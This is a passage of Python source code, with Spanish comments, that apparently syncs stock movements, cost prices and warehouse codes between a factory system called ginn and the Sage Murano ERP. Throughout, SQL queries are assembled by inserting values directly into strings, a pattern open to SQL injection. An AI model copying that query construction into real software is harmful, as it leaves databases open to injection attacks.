descripcion_linea.split()[-1]\n if linea.endswith(\"s\"):\n linea = linea[:-1]\n if linea.lower() == \"geocem\":\n # Problema entre el teclado y la silla. A veces se confunden...\n linea = \"embolsado\"\n except AttributeError:\n # Es un producto de venta especial. Sin línea de producción.\n linea = None\n try:\n # pylint: disable=no-member\n lineas_ginn = pclases.LineaDeProduccion.select(\n pclases.LineaDeProduccion.q.nombre.contains(linea))\n assert lineas_ginn.count() == 1\n linea_ginn = lineas_ginn[0]\n except IndexError:\n linea_ginn = None\n except AssertionError:\n logging.warning(\"Encontradas %d posibles líneas de producción para %s\",\n lineas_ginn.count(), descripcion_linea)\n linea_ginn = lineas_ginn[0]\n return linea_ginn\n\n\ndef buscar_codigo_producto(producto_venta):\n \"\"\"\n Busca el ID del producto en Murano para la descripción del producto\n recibido.\n \"\"\"\n # Se puede dar el caso de que el producto exista pero la descripción no\n # coincida completamente porque Murano ha recortado el texto para que\n # quepa en su mierda de campo tipo CHAR[40]. ¿En serio? 2016 bro!\n # Buscamos directamente por el código de murano_exportar: [PC|PV]+ID\n # Podría aquí devolverlo directamente, pero al menos así me aseguro de\n # que existe en Murano.\n # res = consultar_producto(nombre = productoVenta.descripcion)\n res = consultar_producto(producto=producto_venta)\n try:\n codarticulo = res[0]['CodigoArticulo']\n desc_ginn = producto_venta.descripcion\n assert (desc_ginn.startswith(res[0]['DescripcionArticulo']) or\n desc_ginn.startswith(res[0]['Descripcion2Articulo']))\n except (IndexError, TypeError) as exception:\n strlog = \"(EE)[C] %s no se encuentra en Murano. Excepción: %s\" % (\n producto_venta.descripcion, exception)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n else:\n codarticulo = ''\n except AssertionError:\n strlog = '(WW)[C] La descripción de \"%s\" (%s) ha cambiado.'\\\n ' En Murano es: \"%s\"/\"%s\"' % (producto_venta.descripcion,\n producto_venta.puid,\n res[0]['DescripcionArticulo'],\n res[0]['Descripcion2Articulo'])\n try:\n print(strlog)\n except IOError: # pythonw. No estoy conectado a un terminal.\n pass\n logging.warning(strlog)\n return codarticulo\n\n\ndef buscar_precio_coste(producto, ejercicio, codigo_almacen):\n \"\"\"\n Devuelve el importe en €/kg definido en Murano y después en ginn (si no se\n encuenta) para la familia del producto.\n Si es producto de compra, devuelve el precio de valoracion por unidad de\n producto según la función de valoración definida para él.\n \"\"\"\n cod_familia = determinar_familia_murano(producto)\n if isinstance(producto, pclases.ProductoVenta):\n try:\n precio_coste = buscar_precio_coste_familia_murano(cod_familia)\n except ValueError:\n precio_coste = buscar_precio_coste_familia_ginn(cod_familia)\n elif isinstance(producto, pclases.ProductoCompra):\n try:\n precio_coste = buscar_precio_coste_murano(producto, ejercicio,\n codigo_almacen)\n except ValueError:\n precio_coste = buscar_precio_coste_ginn(producto)\n else:\n # WTF?\n raise ValueError(\"ops:buscar_precio_coste: el producto «%s» recibido\"\n \" no es un producto de compra ni de venta.\"\n % (producto))\n try:\n precio_coste = float(precio_coste) # Viene como Decimal\n except TypeError: # No tiene precio de coste en ningún sitio.\n precio_coste = 0.0\n return precio_coste\n\n\ndef buscar_precio_coste_familia_murano(cod_familia):\n \"\"\"\n Devuelve el precio de coste de la base de datos de Murano para el código\n de familia recibido.\n Lanza ValueError si el código de familia no se encuentra o no tiene\n precio de coste.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n # SQL = r\"\"\"SELECT TOP 1 PrecioPorUnidadEspecifica\n # FROM [%s].[dbo].[Familias]\n # WHERE CodigoFamilia = '%s'\n # AND CodigoSubfamilia = '***********'\n # AND CodigoEmpresa = '%d';\n # \"\"\" % (c.get_database(),\n # cod_familia,\n # CODEMPRESA)\n SQL = r\"\"\"SELECT TOP 1 GEO_CosteUnidadEspecifica\n FROM [%s].[dbo].[Familias]\n WHERE CodigoFamilia = '%s'\n AND CodigoSubfamilia = '**********'\n AND CodigoEmpresa = '%d';\n \"\"\" % (c.get_database(),\n cod_familia,\n CODEMPRESA)\n try:\n precio_coste = c.run_sql(SQL)[0][\"GEO_CosteUnidadEspecifica\"]\n except (TypeError, AttributeError, KeyError):\n # cod_familia es None o no se encontraron registros\n raise ValueError\n except Exception as exception: # pylint: disable=broad-except\n logging.warning(\"No se encontró precio en Murano para la familia \"\n \"«%s». Además, provocó una excepción %s.\",\n cod_familia, exception)\n precio_coste = None\n return precio_coste\n\n\ndef buscar_precio_coste_familia_ginn(cod_familia):\n \"\"\"\n Devuelve el precio por familia definido en ginn.\n \"\"\"\n # HARCODED: Esto debeía ir en la tabla de ginn correspondiente\n # y reflejarlo en la ventana que sea (no hay ventana de familias).\n # En teoría no haría falta ya que siempre van a venir de Murano.\n if cod_familia == \"GEO\":\n precio_coste = 2.210\n elif cod_familia == \"FIB\" or cod_familia == \"FCE\":\n precio_coste = 1.545\n elif cod_familia == \"FEM\":\n precio_coste = 1.884\n else:\n raise ValueError(\"cod_familia debe ser GEO, FIB, FCE o FEM. Se \"\n \"recibió: %s\" % (cod_familia))\n return precio_coste\n\n\ndef buscar_precio_coste_murano(producto, ejercicio, codigo_almacen):\n \"\"\"\n Devuelve el precio de coste de la base de datos de Murano para el producto\n recibido. Según Sage lo aconsejable es enviar el «PrecioMedio» en el\n momento del consumo del producto. Se almacena en el campo «PrecioMedio»\n de la tabla «AcumuladoStock», donde solo hay un registro por producto,\n año y periodo. El periodo 99 siempre guarda el más actualizado.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n cod_articulo = get_codigo_articulo_murano(producto)\n SQL = r\"\"\"SELECT TOP 1 PrecioMedio\n FROM [%s].[dbo].[AcumuladoStock]\n WHERE CodigoArticulo = '%s'\n AND Ejercicio = %d\n AND CodigoAlmacen = '%s'\n AND CodigoEmpresa = '%d'\n AND Periodo = 99;\n \"\"\" % (c.get_database(),\n cod_articulo,\n ejercicio,\n codigo_almacen,\n CODEMPRESA)\n try:\n precio_coste = c.run_sql(SQL)[0][\"PrecioMedio\"]\n except (TypeError, AttributeError, KeyError, IndexError):\n # codalmacen es None o no se encontraron registros\n raise ValueError\n except Exception as exception: # pylint: disable=broad-except\n logging.warning(\"No se encontró precio medio en Murano para el \"\n \"producto «%s». Además, provocó una excepción %s.\",\n cod_articulo, exception)\n precio_coste = None\n return precio_coste\n\n\ndef buscar_precio_coste_ginn(producto):\n \"\"\"\n Devuelve el precio de coste en ginn para el producto (debe ser un producto\n de compra) según su función de valoración.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n precio_coste = producto.get_precio_valoracion()\n elif isinstance(producto, pclases.ProductoVenta):\n # No debería entrar aquí, pero me estoy adelantando al futuro right now\n cod_familia = determinar_familia_murano(producto)\n precio_coste = buscar_precio_coste_familia_ginn(cod_familia)\n else:\n # WTF?\n raise ValueError(\"ops:buscar_precio_coste_ginn: el producto «%s» \"\n \"recibido no es un producto de compra ni de venta.\"\n % (producto))\n return precio_coste\n\n\ndef buscar_codigo_almacen(almacen, articulo=None):\n \"\"\"\n Devuelve almacén de la empresa configurada cuyo nombre coincida con el del\n almacén de ginn recibido.\n Si el almacén recibido es None, entonces buscará el almacén actual donde\n dice Murano que está el artículo recibido como segundo parámetro.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n if almacen:\n filas = c.run_sql(\"\"\"SELECT CodigoAlmacen\n FROM %s.dbo.Almacenes\n WHERE CodigoEmpresa = %d AND Almacen = '%s'\n ORDER BY CodigoAlmacen;\"\"\" % (c.get_database(),\n CODEMPRESA,\n almacen.nombre))\n try:\n codalmacen = filas[0]['CodigoAlmacen']\n except Exception as exception: # pylint: disable=broad-except\n strlog = \"(EE)[A] Almacén '%s' no se encuentra en Murano.\" % (\n almacen.nombre)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n else:\n return 'CEN'\n else:\n if DEBUG:\n return 'CEN'\n else:\n try:\n assert articulo is not None\n codalmacen = get_codalmacen_articulo(c, articulo)\n except AssertionError:\n raise ValueError(\"(EE)[A] Debe especificarse un almacén \"\n \"o un artículo.\")\n return codalmacen\n\n\ndef simulate_guid():\n \"\"\"\n Genera un código aleatorio similar al generado por MSSQLServer.\n \"\"\"\n if VERBOSE and DEBUG:\n strlog = \"Simulando guid...\"\n print(strlog)\n logging.info(strlog)\n import random\n grupos = 8, 4, 4, 4, 12\n subgrupos = []\n for g in grupos:\n subgrupo = \"\"\n for i in range(g): # pylint: disable=unused-variable\n c = random.choice(\"01234567890ABCDE\")\n subgrupo += c\n subgrupos.append(subgrupo)\n guid = \"-\".join(subgrupos)\n if VERBOSE and DEBUG:\n strlog = guid\n print(strlog)\n logging.info(strlog)\n return guid\n\n\ndef buscar_factor_conversion(producto):\n \"\"\"\n Busca el factor de conversión en la tabla de productos de Murano a partir\n del producto de compra o de venta recibido.\n # Por norma general hay que poner 0 en los productos que tengan factor de\n # conversión (traslación directa entre las unidades básicas --bultos-- y\n # las específicas --KG, M2--) y 1 en los que el peso varíe entre cada\n # artículo del mismo producto.\n \"\"\"\n # Balas A, B y C: 0\n # Bigbags: 0\n # Rollos A y B: 0\n # En rollos C: 1\n # En cajas, que todas pesan iguales: 1. Los palés no hay que crearlos, se\n # crean solos al meter las cajas.\n if isinstance(producto, pclases.ProductoVenta):\n if producto.es_clase_c():\n factor_conversion = 1\n else:\n factor_conversion = 0\n else:\n factor_conversion = 1\n return factor_conversion\n\n\ndef generar_guid(conexion):\n \"\"\"\n Devuelve un GUID de SQLServer o simula uno en modo depuración.\n \"\"\"\n try:\n guid = conexion.run_sql(\"SELECT NEWID() AS guid;\")[0]['guid']\n except Exception as exception: # pylint: disable=broad-except\n if not DEBUG:\n raise exception\n else:\n guid = simulate_guid()\n return guid\n\n\ndef get_mov_posicion(conexion, codigo_articulo):\n \"\"\"\n Devuelve el GUID del movimiento de stock asociado al movimiento de número\n de serie. Si el número de serie (el código de artículo) no está en Murano,\n lanza una excepción.\n Si está activado el modo de depuración, devuelve un GUID simulado\n aleatorio.\n \"\"\"\n try:\n mov_posicion = conexion.run_sql(r\"\"\"SELECT TOP 1 MovPosicion\n FROM %s.dbo.TmpIME_MovimientoStock\n WHERE NumeroSerieLc = '%s'\n ORDER BY FechaRegistro DESC;\n \"\"\" % (conexion.get_database(), codigo_articulo))[0]['MovPosicion']\n except Exception as exception: # pylint: disable=broad-except\n if not DEBUG:\n raise exception\n else:\n mov_posicion = simulate_guid()\n return mov_posicion\n\n\ndef get_ultimo_movimiento_articulo_serie(conexion, articulo):\n \"\"\"\n Devuelve el registro de Murano que contiene la última información del\n código del artículo recibido. Típicamente será un movimiento de entrada de\n fabricación, de salida por albarán o None si no existe el artículo en\n Murano.\n \"\"\"\n try:\n codigo_articulo = articulo.codigo\n except AttributeError:\n # Por si recibo directamente un código.\n codigo_articulo = articulo\n SQL = r\"\"\"SELECT TOP 1 *\n FROM [%s].[dbo].[MovimientoArticuloSerie]\n WHERE NumeroSerieLc = '%s' AND CodigoEmpresa = '%d'\n ORDER BY FechaRegistro DESC;\"\"\" % (conexion.get_database(),\n codigo_articulo,\n CODEMPRESA)\n try:\n registro_serie = conexion.run_sql(SQL)[0]\n except (TypeError, AttributeError, KeyError, IndexError):\n # Ese código de artículo (NumeroSerieLc) nunca ha existido en Murano.\n registro_serie = None\n return registro_serie\n\n\ndef get_codalmacen_articulo(conexion, articulo):\n \"\"\"\n Busca el último movimiento de stock del artículo y devuelve el código\n de almacén si es un movimiento de entrada o la cadena vacía si es de\n salida.\n \"\"\"\n registro_serie = get_ultimo_movimiento_articulo_serie(conexion, articulo)\n if registro_serie is None:\n # codalmacen es None o no se encontraron registros\n codalmacen = \"\"\n else:\n codalmacen = registro_serie[\"CodigoAlmacen\"]\n return codalmacen\n\n\ndef get_codigo_articulo_murano(producto):\n \"\"\"\n Hemos elegido arbitrariamente (ver export.muranize_valor) que el código\n de artículo en Murano sea [PC|PV]IDginn.\n Calcula el CodigoArticulo del producto recibido según esa expresión y lo\n devuelve.\n \"\"\"\n if isinstance(producto, pclases.ProductoVenta):\n idmurano = \"PV\"\n else:\n idmurano = \"PC\"\n idmurano += str(producto.id)\n return idmurano\n\n\ndef crear_proceso_IME(conexion):\n \"\"\"\n Crea un proceso de importación con guid único.\n \"\"\"\n guid_proceso = generar_guid(conexion)\n conexion.run_sql(r\"\"\"\n INSERT INTO %s.dbo.Iniciador_tmpIME(IdProcesoIME, EstadoIME,\n sysUsuario, sysUserName,\n Descripcion, TipoImportacion)\n VALUES ('%s', 0, 1, 'administrador', 'Gateway ginn API Murano', 254);\n \"\"\" % (conexion.get_database(), guid_proceso))\n return guid_proceso\n\n\n# pylint: disable=too-many-locals\ndef prepare_params_movstock(articulo, cantidad=1, producto=None,\n codigo_almacen=None, calidad=None, fecha=None):\n \"\"\"\n Prepara los parámetros comunes a todos los artículos con movimiento de\n serie y devuelve la conexión a la base de datos MS-SQLServer.\n Cantidad debe ser 1 para incrementar o -1 para decrementar el almacén.\n \"\"\"\n assert abs(cantidad) == 1\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n database = c.get_database()\n if fecha is None or not isinstance(fecha, datetime.datetime):\n # TODO: Si la fecha no es correcta, en vez de petar ignoro el\n # error silenciosamente. Danger, danger! High voltage!\n today = datetime.datetime.today()\n else:\n today = fecha\n ejercicio = today.year\n periodo = today.month\n fecha = today.strftime(\"%Y-%m-%d %H:%M:%S\")\n documento = int(today.strftime(\"%Y%m%d\"))\n if not producto:\n producto = articulo.productoVenta\n codigo_articulo = buscar_codigo_producto(producto)\n if calidad is None:\n codigo_talla = articulo.get_str_calidad()\n else:\n codigo_talla = calidad.upper()\n grupo_talla = buscar_grupo_talla(producto)\n if cantidad == 1:\n tipo_movimiento = 1 # 1 = entrada, 2 = salida.\n else:\n tipo_movimiento = 2\n if not codigo_almacen:\n codigo_almacen = buscar_codigo_almacen(articulo.almacen, articulo)\n # OJO: Este caso no se dará cuando pasemos a producción. Todos los bultos a\n # consumir ya estarían en Murano previamente y con un almacén asignado.\n # Para pruebas me aseguro de que se envía un almacén buscando el último\n # donde estuvo el bulto.\n if not codigo_almacen: # and tipo_movimiento == 2:\n # Es un consumo y en ginn almacen ya es None. En Murano también es\n # None porque puede ser un artículo que nunca había estado antes\n # en Murano. Como por fuerza debe llevar un almacén, buscamos el\n # almacén donde estaba antes de ser consumida la bala o bigbag.\n # Da igual el tipo de movimiento. Aunque sea una entrada, debemos\n # buscar el último almacén **al menos en pruebas**. Se da el caso en\n # que se fabrica un bigbag (por ejemplo) y se vende justo a\n # continuación antes de que dé tiempo a meterlo en Murano. Ya tiene\n # el almacén a None en ginn y ya no lo traga bien Murano.\n codigo_almacen = buscar_ultimo_almacen_conocido_para(articulo)\n # unidades = 1 # En dimensión base: 1 bala, rollo, caja, bigbag...\n # [20160207] Al final no era en dimensión base, sino en la específica.\n unidades = get_cantidad_dimension_especifica(articulo)\n # precio = 0.0\n precio_kg = buscar_precio_coste(producto, ejercicio, codigo_almacen)\n precio = estimar_precio_coste(articulo, precio_kg)\n factor_conversion = buscar_factor_conversion(producto)\n if factor_conversion:\n unidades2 = unidades * factor_conversion\n else:\n unidades2 = 1 # Siempre será uno porque por cada rollo o bala hay\n # solo 1 mov. stock y 1 mov. serie.\n importe = unidades2 * precio\n unidad_medida2 = buscar_unidad_medida_basica(producto, articulo)\n origen_movimiento = \"F\" # E = Entrada de Stock (entrada directa),\n # F (fabricación), I (inventario),\n # M (rechazo fabricación), S (Salida stock)\n return (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento)\n\n\ndef get_cantidad_dimension_especifica(articulo):\n \"\"\"\n Devuelve la cantidad a sumar o restar del stock de Murano del artículo\n con código de trazabilidad recibido. Va en undad específica: kg o m².\n \"\"\"\n if articulo.es_rollo() or articulo.es_rollo_defectuoso():\n # Los rollos C no tienen m² definidos. Se tratan al peso.\n unidades = get_superficie(articulo) # En dimensión específica: m²\n elif (articulo.es_bala() or articulo.es_bala_cable() or\n articulo.es_rollo_c() or articulo.es_bigbag() or\n articulo.es_caja()):\n # unidades = articulo.get_peso()\n # unidades = get_peso_bruto(articulo) # En dimensión específica: kg\n unidades = get_peso_neto(articulo) # En dimensión específica: kg\n return unidades\n\n\ndef buscar_ultimo_almacen_conocido_para(articulo):\n \"\"\"\n Devuelve el código de almacén de Murano para el último almacén conocido\n en ginn donde estuviera el artículo.\n \"\"\"\n # Fallback al almacén principal, por si no tuviera ABSOLUTAMENTE ningún\n # movimiento.\n last_almacen = pclases.Almacen.get_almacen_principal()\n for movimiento in articulo.get_historial_trazabilidad()[::-1]:\n # Movimientos van del más antiguo al más nuevo. Empiezo por el final.\n fecha, objeto, almacen = movimiento # pylint: disable=unused-variable\n if almacen:\n last_almacen = almacen\n break\n res = buscar_codigo_almacen(last_almacen)\n return res\n\n\ndef estimar_precio_coste(articulo, precio_kg):\n \"\"\"\n Estima el precio de coste del artículo recibido en función de los €/kg\n indicados en el parámetro «precio_kg».\n \"\"\"\n # Este precio de coste \"requete\"-estimado es un CWT en toda regla. Ver\n # correo del 7 de marzo de 2016 - 13:01\n if articulo.es_rollo():\n # Peso teórico ideal, sin embalaje.\n peso = articulo.get_peso_teorico()\n elif articulo.es_rollo_defectuoso():\n peso = articulo.peso\n elif articulo.es_rolloC():\n # Peso real dado en báscula, con embalaje y todo.\n peso = articulo.peso\n elif articulo.es_bala():\n # Peso real dado en báscula, con embalaje y todo.\n peso = articulo.peso\n elif articulo.es_bala_cable():\n # Peso real dado en báscula, con embalaje y todo.\n peso = articulo.peso\n elif articulo.es_bigbag():\n # Peso real dado en báscula, con embalaje y todo.\n peso = articulo.peso\n elif articulo.es_caja():\n # Peso nominal de la caja. El teórico. La embaladora no falla y el\n # cartón es despreciable. Es el peso que se almacena como real para\n # las cajas a la hora de fabricarlas.\n peso = articulo.peso\n else:\n strerror = \"ops:estimar_precio_coste:No se pudo estimar para «%s»\" % (\n articulo)\n logging.error(strerror)\n raise ValueError(strerror)\n return peso * precio_kg\n\n\n# pylint: disable=too-many-arguments\ndef create_bala(bala, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea una bala en las tablas temporales de Murano.\n Recibe un objeto bala de ginn.\n Si cantidad es -1 realiza la baja de almacén de la bala.\n Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n caso, el valor de ejecutar el proceso de importación.\n Si procesar es False no lanza el proceso de importación a través de la\n DDL OEM de Murano.\n Si no se especifica comentario (None o \"\"), se usa uno por defecto.\n \"\"\"\n articulo = bala.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"La bala %s ya existe en Murano. Se ignora.\",\n bala.codigo)\n res = False\n else:\n try:\n partida = bala.lote.codigo\n except AttributeError:\n partida = \"\" # Balas C no tienen lote. No pasa nada. Murano traga.\n unidad_medida = \"KG\"\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(bala.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n ubicacion = \"Almac. de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bala.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef esta_consumido(articulo, parte_de_produccion=None):\n \"\"\"\n Devuelve la fecha de consumo si el artículo se ha consumido. None en\n otro caso.\n Los valores a mirar si se ha consumido son la serie, origen documento y\n comentario del último registro de MovimientoArticuloSerie y deberían\n ser, si es un consumo: FAB, 11 y \"Consumo (bala|bigbag) ginn.*\".\n Si `parte_de_produccion` es algo distinto de None, comprueba que se haya\n consumido en ese parte de producción. Se puede saber porque en el\n movimiento de Murano se guarda el ID del parte de producción.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n # HARDCODED\n if (movserie\n and movserie['SerieDocumento'] == 'FAB'\n and movserie['OrigenDocumento'] == SALIDA\n and movserie['Comentario'].startswith('Consumo')):\n res = movserie['Fecha']\n if parte_de_produccion:\n res = (res and\n str(parte_de_produccion.id) == str(movserie['Documento']))\n else:\n res = None\n return res\n\n\ndef esta_vendido(articulo):\n \"\"\"\n Devuelve la fecha de venta si el artículo se ha vendido. None en\n otro caso.\n Los valores a mirar si se ha vendido son la serie, origen documento y\n comentario del último registro de MovimientoArticuloSerie y deberían\n ser, si es un consumo: FAB, 11 y \"Consumo (bala|bigbag) ginn.*\".\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n # HARDCODED\n if movserie and movserie['OrigenDocumento'] == VENTA:\n res = movserie['Fecha']\n else:\n res = None\n return res\n\n\ndef get_fecha_entrada(articulo, campo=\"FechaRegistro\"):\n \"\"\"\n Devuelve la fecha en que el artículo se dio de alta en Murano.\n Acepta también un código de artículo directamente en lugar de un artículo\n de ginn.\n Si el artículo no se encuentra, devuelve None.\n Permite obtener la fecha, fecha de registro o serie del alta especificando\n el campo en la llamada a la función. Por defecto devuelve la fecha de\n registro, que no tiene por qué coincidir con la fecha indicada para el\n alta.\n \"\"\"\n assert campo in (\"Fecha\", \"FechaRegistro\", \"SerieDocumento\"), \"Solo se\"\\\n \" admiten Fecha, FechaRegistro o SerieDocumento como campo a \"\\\n \"obtener.\"\n if isinstance(articulo, pclases.Articulo):\n codigo = articulo.codigo\n else:\n codigo = articulo\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT Fecha, FechaRegistro, SerieDocumento\n FROM {}.dbo.MovimientoArticuloSerie\n WHERE NumeroSerieLc = '{}'\n AND CodigoEmpresa = {}\n AND OrigenDocumento = 2\n AND (SerieDocumento = 'FAB' OR SerieDocumento = 'API')\n AND CodigoAlmacen = 'GTX';\"\"\".format(conn.get_database(),\n codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(sql)[0][campo]\n except IndexError:\n res = None\n return res\n\n\n# pylint: disable=too-many-arguments,too-many-statements\ndef consume_bala(bala, cantidad=-1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, fecha=None):\n \"\"\"\n Crea un movimiento de salida de una bala en las tablas temporales de\n Murano.\n Recibe un objeto bala de ginn.\n `cantidad` es un parámetro obsoleto que no se usa.\n Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n caso, el valor de ejecutar el proceso de importación.\n Si procesar es False no lanza el proceso de importación a través de la\n DDL OEM de Murano.\n Si la bala ya estaba consumida, no se puede volver a consumir, de modo que\n devuelve False también.\n \"\"\"\n try:\n articulo = bala.articulo\n except AttributeError: # Me han pasado directamente un artículo\n articulo = bala\n if not existe_articulo(articulo):\n logging.warning(\"La bala %s no existe en Murano. Se ignora.\",\n bala.codigo)\n res = False\n elif esta_en_almacen(articulo) is False:\n logging.warning(\"La bala %s no está en almacén en Murano. Se ignora.\",\n bala.codigo)\n res = False\n else:\n try:\n partida = bala.lote.codigo\n except AttributeError:\n partida = \"\" # Balas C no tienen lote. No pasa nada. Murano traga.\n unidad_medida = \"KG\"\n comentario = \"Consumo bala [ginn] {}\".format(bala.get_info())[:40]\n serie = 'FAB'\n ubicacion = \"Almac. de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto,\n fecha=fecha) # pylint: disable=bad-continuation\n try:\n documento = bala.partidaCarga.numpartida # No código. Solo números\n except AttributeError:\n pass # Dejo la fecha, que es valor por defecto que trae.\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = \"CONSFIB\"[:10]\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bala.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef consume_partida_carga(partida_carga):\n \"\"\"\n Consume la partida de carga completa y actualiza el valor `api`:\n - Si no se ha producido ningún error, lo pone a True.\n - Si se ha producido **algún** error, lo pone a False.\n \"\"\"\n res = True\n if partida_carga:\n for bala in partida_carga.balas:\n res = ((bool(esta_consumido(bala.articulo)) or consume_bala(bala))\n and res)\n partida_carga.api = res\n partida_carga.sync()\n return res\n\n\n# pylint: disable=too-many-arguments,too-many-statements\ndef consume_bigbag(bigbag, cantidad=-1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, fecha=None, check_api=True):\n \"\"\"\n Crea un movimiento de salida de un bigbag en las tablas temporales de\n Murano. Si ya estaba consumido en el mismo parte que se está intentando\n consumir de nuevo, no crea movimientos pero devuelve True para poder\n validar el parte correctamente.\n Recibe un objeto bigbag de ginn.\n `cantidad` es un parámetro obsoleto que no se usa.\n Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n caso, el valor de ejecutar el proceso de importación.\n Si procesar es False no lanza el proceso de importación a través de la\n DDL OEM de Murano.\n \"\"\"\n try:\n articulo = bigbag.articulo\n except AttributeError: # Me han pasado directamente un artículo\n articulo = bigbag\n if not existe_articulo(articulo):\n logging.warning(\"El bigbag %s no existe en Murano. Se ignora.\",\n bigbag.codigo)\n res = False\n elif not esta_en_almacen(articulo):\n logging.warning(\"El bigbag %s no está en almacén en Murano.\"\n \" Se ignora.\", 